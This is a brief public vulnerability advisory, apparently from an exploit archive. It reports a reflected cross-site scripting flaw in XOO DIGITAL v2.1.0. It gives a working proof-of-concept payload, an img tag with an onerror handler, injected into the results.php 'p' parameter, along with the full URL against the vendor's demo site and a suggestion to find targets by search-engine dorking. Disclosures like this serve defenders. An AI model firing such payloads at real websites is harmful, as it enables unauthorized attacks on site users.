XOO DIGITAL version 2.1.0 suffers from a cross site scripting vulnerability.
ee7c9f657abf756f4d9deb62a20104f45c9176099ecc9c84d62446dded41559a
====================================================================================================================================
| # Title : XOO DIGITAL v2.1.0 XSS Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) |
| # Vendor : http://xooscripts.com/demos/xoodigital/ |
| # Dork : |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use payload : /results.php?p=1'<--`<img/src=` onerror=confirm`indoushka`> --!>
[+] http://xooscripts.com/demos/xoodigital/results.php?p=1%27%3C--`%3Cimg/src=`%20onerror=confirm`indoushka`%3E%20--!%3E
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================